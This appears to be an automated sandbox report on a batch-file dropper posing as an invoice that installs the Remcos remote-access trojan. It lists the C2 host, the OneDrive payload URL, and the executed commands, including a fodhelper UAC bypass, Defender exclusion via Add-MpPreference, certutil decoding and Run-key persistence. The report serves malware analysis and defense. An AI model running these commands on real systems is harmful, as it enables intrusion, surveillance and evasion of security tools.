Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/03/2024, 13:31 UTC

General

  • Target

    PROFORMA INVOICE AGAINST PO PO05823-24.bat

  • Size

    3.9MB

  • MD5

    9046e68022d4bf996dde93052d67a9b5

  • SHA1

    502662322e0a225d7dffc841c2a24c5c82582f07

  • SHA256

    ade4c81173fbb4420f1bce21ecfafe78757238840af567dde7a3421059631014

  • SHA512

    e433ba2c480032143de574ff8f5bebaa4adacbf2e8adf79637909260d78da2db63d391a5fff4ade32566eb021ed0a563de8ea797d49b3b8d13f877d45a9f10e7

  • SSDEEP

    49152:OBHEIE8fhpytc5M7ZvRd5A81rmvyuZZGqdZWG4s3pU6C:9

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

jaztc.duckdns.org:1808

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    sfsfdrgrre

  • mouse_option

    false

  • mutex

    Rmc-AJ5P19

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • ModiLoader Second Stage 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 18 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 2 IoCs
  • Modifies registry class 5 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PROFORMA INVOICE AGAINST PO PO05823-24.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:688
    • C:\Windows\system32\cmd.exe
      cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3304
      • C:\Windows\system32\extrac32.exe
        extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
        3⤵
          PID:5024
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:368
        • C:\Windows\system32\extrac32.exe
          extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
          3⤵
            PID:2972
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2176
          • C:\Windows\system32\extrac32.exe
            extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
            3⤵
              PID:1404
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3824
            • C:\Users\Public\xkn.exe
              C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
              3⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4452
              • C:\Users\Public\alpha.exe
                "C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                4⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:4216
                • C:\Windows\system32\reg.exe
                  reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                  5⤵
                  • Modifies registry class
                  • Modifies registry key
                  PID:4520
              • C:\Windows\system32\fodhelper.exe
                "C:\Windows\system32\fodhelper.exe"
                4⤵
                  PID:2468
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PROFORMA INVOICE AGAINST PO PO05823-24.bat" "C:\\Users\\Public\\Lewxa.txt" 9
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:4000
              • C:\Users\Public\kn.exe
                C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PROFORMA INVOICE AGAINST PO PO05823-24.bat" "C:\\Users\\Public\\Lewxa.txt" 9
                3⤵
                • Executes dropped EXE
                PID:4852
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1832
              • C:\Users\Public\kn.exe
                C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
                3⤵
                • Executes dropped EXE
                PID:656
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c PING -n 3 127.0.0.1
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2328
              • C:\Windows\system32\PING.EXE
                PING -n 3 127.0.0.1
                3⤵
                • Runs ping.exe
                PID:3992
            • C:\Users\Public\Libraries\Lewxa.com
              C:\\Users\\Public\\Libraries\\Lewxa.com
              2⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2616
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c mkdir "\\?\C:\Windows "
                3⤵
                  PID:4668
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c mkdir "\\?\C:\Windows \System32"
                  3⤵
                    PID:5052
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c "C:\Windows \System32\2763688.exe"
                    3⤵
                      PID:3788
                      • C:\Windows \System32\2763688.exe
                        "C:\Windows \System32\2763688.exe"
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:3068
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
                          5⤵
                            PID:4752
                            • C:\Windows\system32\cmd.exe
                              cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                              6⤵
                                PID:1400
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                  7⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1808
                        • C:\Windows\SysWOW64\extrac32.exe
                          C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Lewxa.com C:\\Users\\Public\\Libraries\\Obakqeqc.PIF
                          3⤵
                            PID:3768
                          • C:\Windows\SysWOW64\colorcpl.exe
                            C:\Windows\System32\colorcpl.exe
                            3⤵
                              PID:4456
                          • C:\Users\Public\alpha.exe
                            C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
                            2⤵
                            • Executes dropped EXE
                            PID:1256
                          • C:\Users\Public\alpha.exe
                            C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
                            2⤵
                            • Executes dropped EXE
                            PID:4000
                          • C:\Users\Public\alpha.exe
                            C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
                            2⤵
                            • Executes dropped EXE
                            PID:1008
                          • C:\Users\Public\alpha.exe
                            C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
                            2⤵
                            • Executes dropped EXE
                            PID:4236
                          • C:\Users\Public\alpha.exe
                            C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:4532
                            • C:\Windows\system32\taskkill.exe
                              taskkill /F /IM SystemSettings.exe
                              3⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2292
                          • C:\Users\Public\alpha.exe
                            C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:4124
                            • C:\Windows\system32\taskkill.exe
                              taskkill /F /IM SystemSettingsAdminFlows.exe
                              3⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3188
                          • C:\Windows\system32\cmd.exe
                            cmd /c del "C:\Users\Public\alpha.exe" / A / F / Q / S
                            2⤵
                              PID:1360
                          • C:\Windows\system32\SystemSettingsAdminFlows.exe
                            "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
                            1⤵
                              PID:488
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2144 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:8
                              1⤵
                                PID:1744

                              Network

                              • flag-us
                                DNS
                                28.118.140.52.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                28.118.140.52.in-addr.arpa
                                IN PTR
                                Response
                              • flag-us
                                DNS
                                185.178.17.96.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                185.178.17.96.in-addr.arpa
                                IN PTR
                                Response
                                185.178.17.96.in-addr.arpa
                                IN PTR
                                a96-17-178-185deploystaticakamaitechnologiescom
                              • flag-us
                                DNS
                                185.178.17.96.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                185.178.17.96.in-addr.arpa
                                IN PTR
                              • flag-us
                                DNS
                                cxcs.microsoft.net
                                Remote address:
                                8.8.8.8:53
                                Request
                                cxcs.microsoft.net
                                IN A
                                Response
                                cxcs.microsoft.net
                                IN CNAME
                                cxcs.microsoft.net.edgekey.net
                                cxcs.microsoft.net.edgekey.net
                                IN CNAME
                                e3230.b.akamaiedge.net
                                e3230.b.akamaiedge.net
                                IN A
                                2.20.37.224
                              • flag-gb
                                GET
                                https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop
                                Remote address:
                                2.20.37.224:443
                                Request
                                GET /api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop HTTP/2.0
                                host: cxcs.microsoft.net
                                accept-encoding: gzip, deflate
                                Response
                                HTTP/2.0 404
                                content-type: text/html
                                content-length: 26
                                date: Tue, 12 Mar 2024 13:31:46 GMT
                              • flag-us
                                DNS
                                224.37.20.2.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                224.37.20.2.in-addr.arpa
                                IN PTR
                                Response
                                224.37.20.2.in-addr.arpa
                                IN PTR
                                a2-20-37-224deploystaticakamaitechnologiescom
                              • flag-us
                                DNS
                                21.53.126.40.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                21.53.126.40.in-addr.arpa
                                IN PTR
                                Response
                              • flag-us
                                DNS
                                21.53.126.40.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                21.53.126.40.in-addr.arpa
                                IN PTR
                              • flag-us
                                DNS
                                57.169.31.20.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                57.169.31.20.in-addr.arpa
                                IN PTR
                                Response
                              • flag-us
                                DNS
                                57.169.31.20.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                57.169.31.20.in-addr.arpa
                                IN PTR
                              • flag-us
                                DNS
                                97.17.167.52.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                97.17.167.52.in-addr.arpa
                                IN PTR
                                Response
                              • flag-us
                                DNS
                                onedrive.live.com
                                Lewxa.com
                                Remote address:
                                8.8.8.8:53
                                Request
                                onedrive.live.com
                                IN A
                                Response
                                onedrive.live.com
                                IN CNAME
                                web.fe.1drv.com
                                web.fe.1drv.com
                                IN CNAME
                                odc-web-geo.onedrive.akadns.net
                                odc-web-geo.onedrive.akadns.net
                                IN CNAME
                                odc-web-brs.onedrive.akadns.net
                                odc-web-brs.onedrive.akadns.net
                                IN CNAME
                                odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net
                                odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net
                                IN CNAME
                                dual-spov-0006.spov-msedge.net
                                dual-spov-0006.spov-msedge.net
                                IN A
                                13.107.137.11
                                dual-spov-0006.spov-msedge.net
                                IN A
                                13.107.139.11
                              • flag-us
                                GET
                                https://onedrive.live.com/download?resid=F2DC8284E0A31E9E%21178&authkey=!AL-8dZFPGSn5eNo
                                Lewxa.com
                                Remote address:
                                13.107.137.11:443
                                Request
                                GET /download?resid=F2DC8284E0A31E9E%21178&authkey=!AL-8dZFPGSn5eNo HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: onedrive.live.com
                                Response
                                HTTP/1.1 302 Found
                                Cache-Control: no-cache, no-store
                                Pragma: no-cache
                                Content-Type: text/html
                                Expires: -1
                                Location: https://oghing.dm.files.1drv.com/y4mzRAK1U6wP3BuxFDpo7FKymqIvcbNjzUUsx0PRmR60w0j60t2SZQjqKx2oq7ySxoDjDn3JBW-hInGlRuZaRCNlbsXDk0bzhBmDPDFQ-3W_VLYMOPXCIYx9IelexH1h2Dutaghi6RVoxscWZJBCzwRr5O8N1ZbudIiQJ_h7LfjFYw3EbbLAwc6vGSSH9joYm5anBOZ5MLivlfSBzi3SEp9_A/255_Obakqeqczmk?download&psid=1
                                Set-Cookie: E=P:4nJby5hC3Ig=:OSCvKPzgqhVNGg3x7Uagk0qBGr4qVdqWaVL5yqNP7QU=:F; domain=.live.com; path=/
                                Set-Cookie: xid=04a660c0-7f85-41a2-87e8-d209d470d8a3&&ODSP-ODWEB-ODCF&108; domain=.live.com; path=/
                                Set-Cookie: xidseq=1; domain=.live.com; path=/
                                Set-Cookie: LD=; domain=.live.com; expires=Tue, 12-Mar-2024 11:51:59 GMT; path=/
                                Set-Cookie: wla42=; domain=live.com; expires=Tue, 19-Mar-2024 13:32:00 GMT; path=/
                                X-Content-Type-Options: nosniff
                                Strict-Transport-Security: max-age=31536000
                                X-MSNServer: 7cdc9459b5-zrtc6
                                X-ODWebServer: eurwesteur637265-odwebpl
                                X-Cache: CONFIG_NOCACHE
                                X-MSEdge-Ref: Ref A: BE43C33534F34A18A5DDE46492D3DB04 Ref B: LON21EDGE2216 Ref C: 2024-03-12T13:31:59Z
                                Date: Tue, 12 Mar 2024 13:31:59 GMT
                                Content-Length: 0
                              • flag-us
                                DNS
                                oghing.dm.files.1drv.com
                                Lewxa.com
                                Remote address:
                                8.8.8.8:53
                                Request
                                oghing.dm.files.1drv.com
                                IN A
                                Response
                                oghing.dm.files.1drv.com
                                IN CNAME
                                dm-files.fe.1drv.com
                                dm-files.fe.1drv.com
                                IN CNAME
                                odc-dm-files-geo.onedrive.akadns.net
                                odc-dm-files-geo.onedrive.akadns.net
                                IN CNAME
                                odc-dm-files-brs.onedrive.akadns.net
                                odc-dm-files-brs.onedrive.akadns.net
                                IN CNAME
                                dm-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net
                                dm-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net
                                IN CNAME
                                l-0003.l-msedge.net
                                l-0003.l-msedge.net
                                IN A
                                13.107.42.12
                              • flag-us
                                GET
                                https://oghing.dm.files.1drv.com/y4mzRAK1U6wP3BuxFDpo7FKymqIvcbNjzUUsx0PRmR60w0j60t2SZQjqKx2oq7ySxoDjDn3JBW-hInGlRuZaRCNlbsXDk0bzhBmDPDFQ-3W_VLYMOPXCIYx9IelexH1h2Dutaghi6RVoxscWZJBCzwRr5O8N1ZbudIiQJ_h7LfjFYw3EbbLAwc6vGSSH9joYm5anBOZ5MLivlfSBzi3SEp9_A/255_Obakqeqczmk?download&psid=1
                                Lewxa.com
                                Remote address:
                                13.107.42.12:443
                                Request
                                GET /y4mzRAK1U6wP3BuxFDpo7FKymqIvcbNjzUUsx0PRmR60w0j60t2SZQjqKx2oq7ySxoDjDn3JBW-hInGlRuZaRCNlbsXDk0bzhBmDPDFQ-3W_VLYMOPXCIYx9IelexH1h2Dutaghi6RVoxscWZJBCzwRr5O8N1ZbudIiQJ_h7LfjFYw3EbbLAwc6vGSSH9joYm5anBOZ5MLivlfSBzi3SEp9_A/255_Obakqeqczmk?download&psid=1 HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: oghing.dm.files.1drv.com
                                Response
                                HTTP/1.1 200 OK
                                Cache-Control: public
                                Content-Length: 1072596
                                Content-Type: application/octet-stream
                                Content-Location: https://oghing.dm.files.1drv.com/y4muwZQMjfJSKhOYk8jG49LSTjlrBYpWNqsAg-9v02baflS6ESmkLAyAFLRQrUIoZWEtjMGqGggFxK-gEKQoS2te9OSHA6Kg1sO0P-o5SP4Y7Hzb_0Nwvjz9QzKftHg6ZaJxDdS42zosBUtwq4hj0zSpFHauufUt0p10AvQ-vYvvTvoMFbMBeZ3c9hDsbmcCjF8
                                Expires: Mon, 10 Jun 2024 13:32:00 GMT
                                Last-Modified: Tue, 12 Mar 2024 08:18:58 GMT
                                Accept-Ranges: bytes
                                ETag: F2DC8284E0A31E9E!178.2
                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                X-MSNSERVER: DS1PPF447DAACC5
                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                MS-CV: gE26zMPzZ0SixIb9S2sJwQ.0
                                X-SqlDataOrigin: S
                                CTag: aYzpGMkRDODI4NEUwQTMxRTlFITE3OC4yNTc
                                X-PreAuthInfo: rv;poba;
                                Content-Disposition: attachment; filename="255_Obakqeqczmk"
                                X-Content-Type-Options: nosniff
                                X-StreamOrigin: X
                                X-AsmVersion: UNKNOWN; 19.1350.213.2011
                                X-Cache: CONFIG_NOCACHE
                                X-MSEdge-Ref: Ref A: 2B047177710A453FA815C59DCF0091F1 Ref B: LON04EDGE0712 Ref C: 2024-03-12T13:32:00Z
                                Date: Tue, 12 Mar 2024 13:31:59 GMT
                              • flag-us
                                DNS
                                11.137.107.13.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                11.137.107.13.in-addr.arpa
                                IN PTR
                                Response
                              • flag-us
                                DNS
                                11.137.107.13.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                11.137.107.13.in-addr.arpa
                                IN PTR
                              • flag-us
                                DNS
                                12.42.107.13.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                12.42.107.13.in-addr.arpa
                                IN PTR
                                Response
                                12.42.107.13.in-addr.arpa
                                IN PTR
                                1drvms
                              • flag-us
                                DNS
                                19.229.111.52.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                19.229.111.52.in-addr.arpa
                                IN PTR
                                Response
                              • flag-us
                                DNS
                                19.229.111.52.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                19.229.111.52.in-addr.arpa
                                IN PTR
                              • flag-us
                                DNS
                                19.229.111.52.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                19.229.111.52.in-addr.arpa
                                IN PTR
                              • flag-us
                                DNS
                                19.229.111.52.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                19.229.111.52.in-addr.arpa
                                IN PTR
                              • flag-us
                                DNS
                                26.165.165.52.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                26.165.165.52.in-addr.arpa
                                IN PTR
                                Response
                              • flag-us
                                DNS
                                26.165.165.52.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                26.165.165.52.in-addr.arpa
                                IN PTR
                              • flag-us
                                DNS
                                198.187.3.20.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                198.187.3.20.in-addr.arpa
                                IN PTR
                                Response
                              • flag-us
                                DNS
                                jaztc.duckdns.org
                                colorcpl.exe
                                Remote address:
                                8.8.8.8:53
                                Request
                                jaztc.duckdns.org
                                IN A
                                Response
                                jaztc.duckdns.org
                                IN A
                                192.3.216.131
                              • flag-us
                                DNS
                                131.216.3.192.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                131.216.3.192.in-addr.arpa
                                IN PTR
                                Response
                                131.216.3.192.in-addr.arpa
                                IN PTR
                                192-3-216-131-host colocrossingcom
                              • flag-us
                                DNS
                                geoplugin.net
                                colorcpl.exe
                                Remote address:
                                8.8.8.8:53
                                Request
                                geoplugin.net
                                IN A
                                Response
                                geoplugin.net
                                IN A
                                178.237.33.50
                              • flag-nl
                                GET
                                http://geoplugin.net/json.gp
                                colorcpl.exe
                                Remote address:
                                178.237.33.50:80
                                Request
                                GET /json.gp HTTP/1.1
                                Host: geoplugin.net
                                Cache-Control: no-cache
                                Response
                                HTTP/1.1 200 OK
                                date: Tue, 12 Mar 2024 13:32:17 GMT
                                server: Apache
                                content-length: 954
                                content-type: application/json; charset=utf-8
                                cache-control: public, max-age=300
                                access-control-allow-origin: *
                              • flag-us
                                DNS
                                50.33.237.178.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                50.33.237.178.in-addr.arpa
                                IN PTR
                                Response
                                50.33.237.178.in-addr.arpa
                                IN CNAME
                                50.32/27.178.237.178.in-addr.arpa
                              • flag-us
                                DNS
                                18.134.221.88.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                18.134.221.88.in-addr.arpa
                                IN PTR
                                Response
                                18.134.221.88.in-addr.arpa
                                IN PTR
                                a88-221-134-18deploystaticakamaitechnologiescom
                              • flag-us
                                DNS
                                241.150.49.20.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                241.150.49.20.in-addr.arpa
                                IN PTR
                                Response
                              • flag-us
                                DNS
                                241.150.49.20.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                241.150.49.20.in-addr.arpa
                                IN PTR
                              • flag-us
                                DNS
                                240.221.184.93.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                240.221.184.93.in-addr.arpa
                                IN PTR
                                Response
                              • flag-us
                                DNS
                                tse1.mm.bing.net
                                Remote address:
                                8.8.8.8:53
                                Request
                                tse1.mm.bing.net
                                IN A
                                Response
                                tse1.mm.bing.net
                                IN CNAME
                                mm-mm.bing.net.trafficmanager.net
                                mm-mm.bing.net.trafficmanager.net
                                IN CNAME
                                dual-a-0001.a-msedge.net
                                dual-a-0001.a-msedge.net
                                IN A
                                204.79.197.200
                                dual-a-0001.a-msedge.net
                                IN A
                                13.107.21.200
                              • flag-us
                                DNS
                                tse1.mm.bing.net
                                Remote address:
                                8.8.8.8:53
                                Request
                                tse1.mm.bing.net
                                IN A
                              • flag-us
                                GET
                                https://tse1.mm.bing.net/th?id=OADD2.10239317301684_1450KFM0D4YJ64Y71&pid=21.2&w=1080&h=1920&c=4
                                Remote address:
                                204.79.197.200:443
                                Request
                                GET /th?id=OADD2.10239317301684_1450KFM0D4YJ64Y71&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
                                host: tse1.mm.bing.net
                                accept: */*
                                accept-encoding: gzip, deflate, br
                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                Response
                                HTTP/2.0 200
                                cache-control: public, max-age=2592000
                                content-length: 234680
                                content-type: image/jpeg
                                x-cache: TCP_HIT
                                access-control-allow-origin: *
                                access-control-allow-headers: *
                                access-control-allow-methods: GET, POST, OPTIONS
                                timing-allow-origin: *
                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                x-msedge-ref: Ref A: 7A5747516CE04DA0BBB59C0345301C9F Ref B: LON04EDGE1208 Ref C: 2024-03-12T13:33:35Z
                                date: Tue, 12 Mar 2024 13:33:35 GMT
                              • flag-us
                                GET
                                https://tse1.mm.bing.net/th?id=OADD2.10239317301311_18QMRZHF9BCDK2OBJ&pid=21.2&w=1920&h=1080&c=4
                                Remote address:
                                204.79.197.200:443
                                Request
                                GET /th?id=OADD2.10239317301311_18QMRZHF9BCDK2OBJ&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
                                host: tse1.mm.bing.net
                                accept: */*
                                accept-encoding: gzip, deflate, br
                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                Response
                                HTTP/2.0 200
                                cache-control: public, max-age=2592000
                                content-length: 194603
                                content-type: image/jpeg
                                x-cache: TCP_HIT
                                access-control-allow-origin: *
                                access-control-allow-headers: *
                                access-control-allow-methods: GET, POST, OPTIONS
                                timing-allow-origin: *
                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                x-msedge-ref: Ref A: 90C6BA1512F24D15BF8EF6550CAB2F3D Ref B: LON04EDGE1208 Ref C: 2024-03-12T13:33:35Z
                                date: Tue, 12 Mar 2024 13:33:35 GMT
                              • flag-us
                                GET
                                https://tse1.mm.bing.net/th?id=OADD2.10239317301275_1820437F4BE6O8J6E&pid=21.2&w=1920&h=1080&c=4
                                Remote address:
                                204.79.197.200:443
                                Request
                                GET /th?id=OADD2.10239317301275_1820437F4BE6O8J6E&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
                                host: tse1.mm.bing.net
                                accept: */*
                                accept-encoding: gzip, deflate, br
                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                Response
                                HTTP/2.0 200
                                cache-control: public, max-age=2592000
                                content-length: 639487
                                content-type: image/jpeg
                                x-cache: TCP_HIT
                                access-control-allow-origin: *
                                access-control-allow-headers: *
                                access-control-allow-methods: GET, POST, OPTIONS
                                timing-allow-origin: *
                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
